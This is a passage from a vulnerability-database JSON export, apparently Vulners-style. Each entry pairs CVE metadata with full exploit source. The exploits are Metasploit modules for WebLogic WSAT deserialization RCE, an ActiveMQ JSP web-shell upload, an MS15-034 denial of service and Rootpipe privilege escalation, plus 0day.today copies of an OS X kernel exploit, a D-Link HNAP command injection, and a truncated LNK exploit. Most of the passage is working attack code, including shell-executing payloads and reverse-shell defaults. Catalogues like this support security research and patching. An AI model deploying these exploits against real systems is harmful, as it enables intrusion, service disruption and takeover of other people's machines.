'DefaultTarget' => 0\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),\n OptPort.new('RPORT', [true, \"The remote port that the WebLogic WSAT endpoint listens on\", 7001]),\n OptFloat.new('TIMEOUT', [true, \"The timeout value of requests to RHOST\", 20.0]),\n # OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10])\n ])\n end\n\n def cmd_base\n if target['Platform'] == 'win'\n return 'cmd'\n else\n return '/bin/sh'\n end\n end\n\n def cmd_opt\n if target['Platform'] == 'win'\n return '/c'\n else\n return '-c'\n end\n end\n\n\n #\n # This generates a XML payload that will execute the desired payload on the RHOST\n #\n def exploit_process_builder_payload\n # Generate a payload which will execute on a *nix machine using /bin/sh\n xml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java>\n <void class=\"java.lang.ProcessBuilder\">\n <array class=\"java.lang.String\" length=\"3\" >\n <void index=\"0\">\n <string>#{cmd_base}</string>\n </void>\n <void index=\"1\">\n <string>#{cmd_opt}</string>\n </void>\n <void index=\"2\">\n <string>#{payload.encoded.encode(xml: :text)}</string>\n </void>\n </array>\n <void method=\"start\"/>\n </void>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>}\n end\n\n #\n # This builds a XML payload that will generate a HTTP GET request to our SRVHOST\n # from the target machine.\n #\n def check_process_builder_payload\n xml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\n <void id=\"url\" class=\"java.net.URL\">\n <string>#{get_uri.encode(xml: :text)}</string>\n </void>\n <void idref=\"url\">\n <void id=\"stream\" method = \"openStream\" />\n </void>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>}\n end\n\n #\n # In the event that a 'check' host responds, we should respond randomly so that we don't clog up\n # the logs too much with a no response error or similar.\n #\n def on_request_uri(cli, request)\n random_content = '<html><head></head><body><p>'+Rex::Text.rand_text_alphanumeric(20)+'<p></body></html>'\n send_response(cli, random_content)\n\n @received_request = true\n end\n\n #\n # The exploit method connects to the remote service and sends a randomly generated string\n # encapsulated within a SOAP XML body. This will start an HTTP server for us to receive\n # the response from. This is based off of the exploit technique from\n # exploits/windows/novell/netiq_pum_eval.rb\n #\n # This doesn't work as is because MSF cannot mix HttpServer and HttpClient\n # at the time of authoring this\n #\n # def check\n # start_service\n #\n # print_status('Sending the check payload...')\n # res = send_request_cgi({\n # 'method' => 'POST',\n # 'uri' => normalize_uri(target_uri.path),\n # 'data' => check_process_builder_payload,\n # 'ctype' => 'text/xml;charset=UTF-8'\n # }, datastore['TIMEOUT'])\n #\n # print_status(\"Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...\")\n #\n # waited = 0\n # until @received_request\n # sleep 1\n # waited += 1\n # if waited > datastore['HTTP_DELAY']\n # cleanup_service\n # return Exploit::CheckCode::Safe\n # end\n # end\n #\n # cleanup_service\n # return Exploit::CheckCode::Vulnerable\n # end\n\n #\n # The exploit method connects to the remote service and sends the specified payload\n # encapsulated within a SOAP XML body.\n #\n def exploit\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'data' => exploit_process_builder_payload,\n 'ctype' => 'text/xml;charset=UTF-8'\n }, datastore['TIMEOUT'])\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-04T04:30:40", "description": "The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request.\n", "cvss3": {}, "published": "2017-06-06T18:33:42", "type": "metasploit", "title": "ActiveMQ web shell upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-3088"], "modified": "2021-06-14T20:02:38", "id": "MSF:EXPLOIT-MULTI-HTTP-APACHE_ACTIVEMQ_UPLOAD_JSP-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/apache_activemq_upload_jsp/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'ActiveMQ web shell upload',\n 'Description' => %q(\n The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0\n allows remote attackers to upload and execute arbitrary files via an\n HTTP PUT followed by an HTTP MOVE request.\n ),\n 'Author' => [ 'Ian Anderson <andrsn84[at]gmail.com>', 'Hillary Benson <1n7r1gu3[at]gmail.com>' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2016-3088' ],\n [ 'URL', 'http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt' ]\n ],\n 'Privileged' => true,\n 'Platform' => %w{ java linux win },\n 'Targets' =>\n [\n [ 'Java Universal',\n {\n 'Platform' => 'java',\n 'Arch' => ARCH_JAVA\n }\n ],\n [ 'Linux',\n {\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86\n }\n ],\n [ 'Windows',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_X86\n }\n ]\n ],\n 'DisclosureDate' => '2016-06-01',\n 'DefaultTarget' => 0))\n register_options(\n [\n OptString.new('BasicAuthUser', [ true, 'The username to authenticate as', 'admin' ]),\n OptString.new('BasicAuthPass', [ true, 'The password for the specified username', 'admin' ]),\n OptString.new('JSP', [ false, 'JSP name to use, excluding the .jsp extension (default: random)', nil ]),\n OptString.new('AutoCleanup', [ false, 'Remove web shells after callback is received', 'true' ]),\n Opt::RPORT(8161)\n ])\n register_advanced_options(\n [\n OptString.new('UploadPath', [false, 'Custom directory into which web shells are uploaded', nil])\n ])\n end\n\n def jsp_text(payload_name)\n %{\n <%@ page import=\"java.io.*\"\n %><%@ page import=\"java.net.*\"\n %><%\n URLClassLoader cl = new java.net.URLClassLoader(new java.net.URL[]{new java.io.File(request.getRealPath(\"./#{payload_name}.jar\")).toURI().toURL()});\n Class c = cl.loadClass(\"metasploit.Payload\");\n c.getMethod(\"main\",Class.forName(\"[Ljava.lang.String;\")).invoke(null,new java.lang.Object[]{new java.lang.String[0]});\n %>}\n end\n\n def exploit\n jar_payload = payload.encoded_jar.pack\n payload_name = datastore['JSP'] || rand_text_alpha(8 + rand(8))\n host = \"#{datastore['RHOST']}:#{datastore['RPORT']}\"\n @url = datastore['SSL'] ? \"https://#{host}\" : \"http://#{host}\"\n paths = get_upload_paths\n paths.each do |path|\n if try_upload(path, jar_payload, payload_name)\n break handler if trigger_payload(payload_name)\n print_error('Unable to trigger payload')\n end\n end\n end\n\n def try_upload(path, jar_payload, payload_name)\n ['.jar', '.jsp'].each do |ext|\n file_name = payload_name + ext\n data = ext == '.jsp' ? jsp_text(payload_name) : jar_payload\n move_headers = { 'Destination' => \"#{@url}/#{path}/#{file_name}\" }\n upload_uri = normalize_uri('fileserver', file_name)\n print_status(\"Uploading #{move_headers['Destination']}\")\n register_files_for_cleanup \"#{path}/#{file_name}\" if datastore['AutoCleanup'].casecmp('true')\n return error_out unless send_request('PUT', upload_uri, 204, 'data' => data) &&\n send_request('MOVE', upload_uri, 204, 'headers' => move_headers)\n @trigger_resource = /webapps(.*)/.match(path)[1]\n end\n true\n end\n\n def get_upload_paths\n base_path = \"#{get_install_path}/webapps\"\n custom_path = datastore['UploadPath']\n return [normalize_uri(base_path, custom_path)] unless custom_path.nil?\n [ \"#{base_path}/api/\", \"#{base_path}/admin/\" ]\n end\n\n def get_install_path\n properties_page = send_request('GET', \"#{@url}/admin/test/\")\n fail_with(Failure::UnexpectedReply, 'Target did not respond with 200 OK to a request to /admin/test/!') if properties_page == false\n properties_page = properties_page.body\n match = properties_page.match(/activemq\\.home=([^,}]+)/)\n return match[1] unless match.nil?\n end\n\n def send_request(method, uri, expected_response = 200, opts = {})\n opts['headers'] ||= {}\n opts['headers']['Authorization'] = basic_auth(datastore['BasicAuthUser'], datastore['BasicAuthPass'])\n opts['headers']['Connection'] = 'close'\n r = send_request_cgi(\n {\n 'method' => method,\n 'uri' => uri\n }.merge(opts)\n )\n if r.nil?\n fail_with(Failure::Unreachable, 'Could not reach the target!')\n end\n return false if expected_response != r.code.to_i\n r\n end\n\n def trigger_payload(payload_name)\n send_request('POST', @url + @trigger_resource + payload_name + '.jsp')\n end\n\n def error_out\n print_error('Upload failed')\n @trigger_resource = nil\n false\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/apache_activemq_upload_jsp.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T03:32:21", "description": "This module will check if scanned hosts are vulnerable to CVE-2015-1635 (MS15-034), a vulnerability in the HTTP protocol stack (HTTP.sys) that could result in arbitrary code execution. This module will try to cause a denial-of-service.\n", "cvss3": {}, "published": "2015-04-15T18:13:16", "type": "metasploit", "title": "MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1635"], "modified": "2022-02-16T23:22:40", "id": "MSF:AUXILIARY-DOS-HTTP-MS15_034_ULONGLONGADD-", "href": "https://www.rapid7.com/db/modules/auxiliary/dos/http/ms15_034_ulonglongadd/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n # Watch out, dos all the things\n include Msf::Auxiliary::Scanner\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service',\n 'Description' => %q{\n This module will check if scanned hosts are vulnerable to CVE-2015-1635 (MS15-034), a\n vulnerability in the HTTP protocol stack (HTTP.sys) that could result in arbitrary code\n execution. This module will try to cause a denial-of-service.\n },\n 'Author' =>\n [\n # Bill did all the work (see the pastebin code), twitter: @hectorh56193716\n 'Bill Finlayson',\n # MSF. But really, these people made it happen:\n # https://github.com/rapid7/metasploit-framework/pull/5150\n 'sinn3r'\n ],\n 'References' =>\n [\n ['CVE', '2015-1635'],\n ['MSB', 'MS15-034'],\n ['URL', 'https://pastebin.com/ypURDPc4'],\n ['URL', 'https://github.com/rapid7/metasploit-framework/pull/5150'],\n ['URL', 'https://community.qualys.com/blogs/securitylabs/2015/04/20/ms15-034-analyze-and-remote-detection'],\n ['URL', 'http://www.securitysift.com/an-analysis-of-ms15-034/']\n ],\n 'License' => MSF_LICENSE\n ))\n\n register_options(\n [\n OptString.new('TARGETURI', [false, 'URI to the site (e.g /site/) or a valid file resource (e.g /welcome.png)', '/'])\n ])\n end\n\n def upper_range\n 0xFFFFFFFFFFFFFFFF\n end\n\n def run_host(ip)\n if check_host(ip) == Exploit::CheckCode::Vulnerable\n dos_host(ip)\n else\n print_status(\"Probably not vulnerable, will not dos it.\")\n end\n end\n\n # Needed to allow the vulnerable uri to be shared between the #check and #dos\n def target_uri\n @target_uri ||= super\n end\n\n def get_file_size(ip)\n @file_size ||= lambda {\n file_size = -1\n uri = normalize_uri(target_uri.path)\n res = send_request_raw('uri' => uri)\n\n unless res\n vprint_error(\"Connection timed out\")\n return file_size\n end\n\n if res.code == 404\n vprint_error(\"You got a 404. URI must be a valid resource.\")\n return file_size\n end\n\n file_size = res.body.length\n vprint_status(\"File length: #{file_size} bytes\")\n\n return file_size\n }.call\n end\n\n def dos_host(ip)\n file_size = get_file_size(ip)\n lower_range = file_size - 2\n\n # In here we have to use Rex because if we dos it, it causes our module to hang too\n uri = normalize_uri(target_uri.path)\n begin\n cli = Rex::Proto::Http::Client.new(ip)\n cli.connect\n req = cli.request_raw(\n 'uri' => uri,\n 'method' => 'GET',\n 'headers' => {\n 'Range' => \"bytes=#{lower_range}-#{upper_range}\"\n }\n )\n cli.send_request(req)\n rescue ::Errno::EPIPE, ::Timeout::Error\n # Same exceptions the HttpClient mixin catches\n end\n print_status(\"DOS request sent\")\n end\n\n def potential_static_files_uris\n uri = normalize_uri(target_uri.path)\n\n return [uri] unless uri[-1, 1] == '/'\n\n uris = [\"#{uri}welcome.png\"]\n res = send_request_raw('uri' => uri, 'method' => 'GET')\n\n return uris unless res\n\n site_uri = URI.parse(full_uri)\n page = Nokogiri::HTML(res.body.encode('UTF-8', invalid: :replace, undef: :replace))\n\n page.xpath('//link|//script|//style|//img').each do |tag|\n %w(href src).each do |attribute|\n attr_value = tag[attribute]\n\n next unless attr_value && !attr_value.empty?\n\n uri = site_uri.merge(URI::DEFAULT_PARSER.escape(attr_value.strip))\n\n next unless uri.host == vhost || uri.host == rhost\n\n uris << uri.path if uri.path =~ /\\.[a-z]{2,}$/i # Only keep path with a file\n end\n end\n\n uris.uniq\n end\n\n def check_host(ip)\n potential_static_files_uris.each do |potential_uri|\n uri = normalize_uri(potential_uri)\n\n res = send_request_raw(\n 'uri' => uri,\n 'method' => 'GET',\n 'headers' => {\n 'Range' => \"bytes=0-#{upper_range}\"\n }\n )\n\n vmessage = \"#{peer} - Checking #{uri}\"\n\n if res && res.body.include?('Requested Range Not Satisfiable')\n vprint_status(\"#{vmessage} [#{res.code}] - Vulnerable\")\n\n target_uri.path = uri # Needed for the DoS attack\n\n return Exploit::CheckCode::Vulnerable\n elsif res && res.body.include?('The request has an invalid header name')\n vprint_status(\"#{vmessage} [#{res.code}] - Safe\")\n\n return Exploit::CheckCode::Safe\n else\n vprint_status(\"#{vmessage} - Unknown\")\n end\n end\n\n Exploit::CheckCode::Unknown\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-02T12:15:28", "description": "This module exploits a hidden backdoor API in Apple's Admin framework on Mac OS X to escalate privileges to root, dubbed \"Rootpipe.\" This module was tested on Yosemite 10.10.2 and should work on previous versions. The patch for this issue was not backported to older releases. Note: you must run this exploit as an admin user to escalate to root.\n", "cvss3": {}, "published": "2015-04-10T16:22:00", "type": "metasploit", "title": "Apple OS X Rootpipe Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-1130"], "modified": "2021-02-25T16:47:49", "id": "MSF:EXPLOIT-OSX-LOCAL-ROOTPIPE-", "href": "https://www.rapid7.com/db/modules/exploit/osx/local/rootpipe/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GreatRanking\n\n include Msf::Post::File\n include Msf::Post::OSX::Priv\n include Msf::Post::OSX::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apple OS X Rootpipe Privilege Escalation',\n 'Description' => %q{\n This module exploits a hidden backdoor API in Apple's Admin framework on\n Mac OS X to escalate privileges to root, dubbed \"Rootpipe.\"\n\n This module was tested on Yosemite 10.10.2 and should work on previous versions.\n\n The patch for this issue was not backported to older releases.\n\n Note: you must run this exploit as an admin user to escalate to root.\n },\n 'Author' => [\n 'Emil Kvarnhammar', # Vulnerability discovery and PoC\n 'joev', # Copy/paste monkey\n 'wvu' # Meta copy/paste monkey\n ],\n 'References' => [\n ['CVE', '2015-1130'],\n ['OSVDB', '114114'],\n ['EDB', '36692'],\n ['URL', 'https://truesecdev.wordpress.com/2015/04/09/hidden-backdoor-api-to-root-privileges-in-apple-os-x/']\n ],\n 'DisclosureDate' => '2015-04-09',\n 'License' => MSF_LICENSE,\n 'Platform' => 'osx',\n 'Arch' => ARCH_X64,\n 'SessionTypes' => ['shell'],\n 'Privileged' => true,\n 'Targets' => [\n ['Mac OS X 10.9-10.10.2', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'osx/x64/shell_reverse_tcp',\n 'PrependSetreuid' => true\n }\n ))\n\n register_options [\n OptString.new('PYTHON', [true, 'Python executable', '/usr/bin/python'])\n ]\n register_advanced_options [\n OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])\n ]\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def check\n (ver? && is_admin?) ? CheckCode::Appears : CheckCode::Safe\n end\n\n def exploit\n if is_root?\n fail_with Failure::BadConfig, 'Session already has root privileges'\n end\n\n unless is_admin?\n fail_with Failure::NoAccess, \"User is not in the 'admin' group, bailing.\"\n end\n\n if check != CheckCode::Appears\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n print_status(\"Writing exploit to `#{exploit_file}'\")\n write_file(exploit_file, python_exploit)\n register_file_for_cleanup(exploit_file)\n\n print_status(\"Writing payload to `#{payload_file}'\")\n write_file(payload_file, binary_payload)\n register_file_for_cleanup(payload_file)\n\n print_status('Executing exploit...')\n cmd_exec(sploit)\n print_status('Executing payload...')\n cmd_exec(payload_file)\n end\n\n def ver?\n Rex::Version.new(get_sysinfo['ProductVersion']).between?(\n Rex::Version.new('10.9'), Rex::Version.new('10.10.2')\n )\n end\n\n def sploit\n \"#{datastore['PYTHON']} #{exploit_file} #{payload_file} #{payload_file}\"\n end\n\n def python_exploit\n File.read(File.join(\n Msf::Config.data_directory, 'exploits', 'CVE-2015-1130', 'exploit.py'\n ))\n end\n\n def binary_payload\n Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)\n end\n\n def exploit_file\n @exploit_file ||= \"#{base_dir}/#{Rex::Text.rand_text_alpha(8)}\"\n end\n\n def payload_file\n @payload_file ||= \"#{base_dir}/#{Rex::Text.rand_text_alpha(8)}\"\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/local/rootpipe.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-01-11T05:27:33", "description": "A heap overflow in IOHIKeyboardMapper::parseKeyMapping allows kernel memory corruption in Mac OS X before 10.10. By abusing a bug in the IORegistry, kernel pointers can also be leaked, allowing a full kASLR bypass. Tested on Mavericks 10.9.5, and should work on previous versions. The issue has been patched silently in Yosemite.", "cvss3": {}, "published": "2014-12-02T00:00:00", "type": "zdt", "title": "Mac OS X IOKit Keyboard Driver Root Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-4404"], "modified": "2014-12-02T00:00:00", "id": "1337DAY-ID-22959", "href": "https://0day.today/exploit/description/22959", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'rex'\r\n\r\nclass Metasploit3 < Msf::Exploit::Local\r\n Rank = ManualRanking # Can cause kernel crash\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Mac OS X IOKit Keyboard Driver Root Privilege Escalation',\r\n 'Description' => %q{\r\n A heap overflow in IOHIKeyboardMapper::parseKeyMapping allows kernel memory\r\n corruption in Mac OS X before 10.10. By abusing a bug in the IORegistry, kernel\r\n pointers can also be leaked, allowing a full kASLR bypass.\r\n\r\n Tested on Mavericks 10.9.5, and should work on previous versions.\r\n\r\n The issue has been patched silently in Yosemite.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Ian Beer', # discovery, advisory, publication, and a most excellent blog post\r\n 'joev' # copy/paste monkey\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-4404' ],\r\n [ 'URL', 'http://googleprojectzero.blogspot.com/2014/11/pwn4fun-spring-2014-safari-part-ii.html' ],\r\n # Heap overflow:\r\n [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=40' ],\r\n # kALSR defeat:\r\n [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=126' ]\r\n ],\r\n 'Platform' => 'osx',\r\n 'Arch' => ARCH_X86_64,\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' => [\r\n [ 'Mac OS X 10.9.5 Mavericks x64 (Native Payload)', { } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Sep 24 2014'\r\n ))\r\n end\r\n\r\n def check\r\n if ver_lt(osx_ver, \"10.10\")\r\n Exploit::CheckCode::Vulnerable\r\n else\r\n Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n exploit_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2014-4404')\r\n binary_exploit = File.read(File.join(exploit_path, 'key_exploit'))\r\n binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)\r\n exploit_file = \"/tmp/#{Rex::Text::rand_text_alpha_lower(12)}\"\r\n payload_file = \"/tmp/#{Rex::Text::rand_text_alpha_lower(12)}\"\r\n\r\n print_status(\"Writing exploit file as '#{exploit_file}'\")\r\n write_file(exploit_file, binary_exploit)\r\n register_file_for_cleanup(exploit_file)\r\n\r\n print_status(\"Writing payload file as '#{payload_file}'\")\r\n write_file(payload_file, binary_payload)\r\n register_file_for_cleanup(payload_file)\r\n\r\n print_status(\"Executing payload...\")\r\n cmd_exec(\"chmod +x #{exploit_file}\")\r\n cmd_exec(\"chmod +x #{payload_file}\")\r\n cmd_exec(\"#{exploit_file} #{payload_file}\")\r\n end\r\n\r\n def osx_ver\r\n cmd_exec(\"sw_vers -productVersion\").to_s.strip\r\n end\r\n\r\n def ver_lt(a, b)\r\n Gem::Version.new(a) < Gem::Version.new(b)\r\n end\r\n\r\nend\n\n# 0day.today [2018-01-11] #", "sourceHref": "https://0day.today/exploit/22959", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-19T09:18:51", "description": "Different D-Link Routers are vulnerable to OS command injection in the HNAP SOAP interface. Since it is a blind OS command injection vulnerability, there is no output for the executed command. This Metasploit module has been tested on a DIR-645 device. The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB, DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB, DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR", "cvss3": {}, "published": "2015-06-02T00:00:00", "type": "zdt", "title": "D-Link Devices HNAP SOAPAction-Header Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-2051"], "modified": "2015-06-02T00:00:00", "id": "1337DAY-ID-23682", "href": "https://0day.today/exploit/description/23682", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'D-Link Devices HNAP SOAPAction-Header Command Execution',\r\n 'Description' => %q{\r\n Different D-Link Routers are vulnerable to OS command injection in the HNAP SOAP\r\n interface. Since it is a blind OS command injection vulnerability, there is no\r\n output for the executed command. This module has been tested on a DIR-645 device.\r\n The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB,\r\n DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB,\r\n DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR\r\n },\r\n 'Author' =>\r\n [\r\n 'Samuel Huntley', # first public documentation of this Vulnerability on DIR-645\r\n 'Craig Heffner', # independent Vulnerability discovery on different other routers\r\n 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051'],\r\n ['URL', 'http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/']\r\n ],\r\n 'DisclosureDate' => 'Feb 13 2015',\r\n 'Privileged' => true,\r\n 'Platform' => 'linux',\r\n 'Targets' =>\r\n [\r\n [ 'MIPS Little Endian',\r\n {\r\n 'Arch' => ARCH_MIPSLE\r\n }\r\n ],\r\n [ 'MIPS Big Endian', # unknown if there are BE devices out there ... but in case we have a target\r\n {\r\n 'Arch' => ARCH_MIPSBE\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0\r\n ))\r\n \r\n deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOUR')\r\n end\r\n \r\n def check\r\n uri = '/HNAP1/'\r\n soap_action = 'http://purenetworks.com/HNAP1/GetDeviceSettings'\r\n \r\n begin\r\n res = send_request_cgi({\r\n 'uri' => uri,\r\n 'method' => 'GET',\r\n 'headers' => {\r\n 'SOAPAction' => soap_action,\r\n }\r\n })\r\n \r\n if res && [200].include?(res.code) && res.body =~ /D-Link/\r\n return Exploit::CheckCode::Detected\r\n end\r\n rescue ::Rex::ConnectionError\r\n return Exploit::CheckCode::Unknown\r\n end\r\n \r\n Exploit::CheckCode::Unknown\r\n end\r\n \r\n def exploit\r\n print_status(\"#{peer} - Trying to access the device ...\")\r\n \r\n unless check == Exploit::CheckCode::Detected\r\n fail_with(Failure::Unknown, \"#{peer} - Failed to access the vulnerable device\")\r\n end\r\n \r\n print_status(\"#{peer} - Exploiting...\")\r\n \r\n execute_cmdstager(\r\n :flavour => :echo,\r\n :linemax => 200,\r\n :temp => ''\r\n )\r\n end\r\n \r\n def execute_command(cmd, opts)\r\n \r\n uri = '/HNAP1/'\r\n \r\n # we can not use / in our command so we need to use a little trick\r\n cmd_new = 'cd && cd tmp && export PATH=$PATH:. && ' << cmd\r\n soap_action = \"http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`\"\r\n \r\n begin\r\n res = send_request_cgi({\r\n 'uri' => uri,\r\n 'method' => 'GET',\r\n 'headers' => {\r\n 'SOAPAction' => soap_action,\r\n }\r\n }, 3)\r\n rescue ::Rex::ConnectionError\r\n fail_with(Failure::Unreachable, \"#{peer} - Failed to connect to the web server\")\r\n end\r\n end\r\nend\n\n# 0day.today [2018-03-19] #", "sourceHref": "https://0day.today/exploit/23682", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-02-06T01:16:08", "description": "Exploit for windows platform in category local exploits", "cvss3": {}, "published": "2017-08-06T00:00:00", "type": "zdt", "title": "Microsoft Windows - LNK Shortcut File Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-8464"], "modified": "2017-08-06T00:00:00", "id": "1337DAY-ID-28245", "href": "https://0day.today/exploit/description/28245", "sourceData": "#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n \r\n# Title : CVE-2017-8464 | LNK Remote Code Execution Vulnerability\r\n# CVE : 2017-8464\r\n# Authors : [ykoster, nixawk]\r\n# Notice : Only for educational purposes.\r\n# Support : python2\r\n \r\nimport struct\r\n \r\n \r\ndef generate_SHELL_LINK_HEADER():\r\n # _________________________________________________________________\r\n # | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |\r\n # |0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|\r\n # -----------------------------------------------------------------\r\n # | HeaderSize |\r\n # -----------------------------------------------------------------\r\n # | LinkCLSID (16 bytes) |\r\n # -----------------------------------------------------------------\r\n # | ... |\r\n # -----------------------------------------------------------------\r\n # | ... |\r\n # -----------------------------------------------------------------\r\n # | LinkFlags |\r\n # -----------------------------------------------------------------\r\n # | FileAttributes |\r\n # -----------------------------------------------------------------\r\n # | CreationTime |\r\n # -----------------------------------------------------------------\r\n # | ... |\r\n # -----------------------------------------------------------------\r\n # | AccessTime |\r\n # -----------------------------------------------------------------\r\n # | ... |\r\n # -----------------------------------------------------------------\r\n # | WriteTime |\r\n # -----------------------------------------------------------------\r\n # | ... |\r\n # -----------------------------------------------------------------\r\n # | FileSize |\r\n # -----------------------------------------------------------------\r\n # | IconIndex |\r\n # -----------------------------------------------------------------\r\n # | ShowCommand |\r\n # 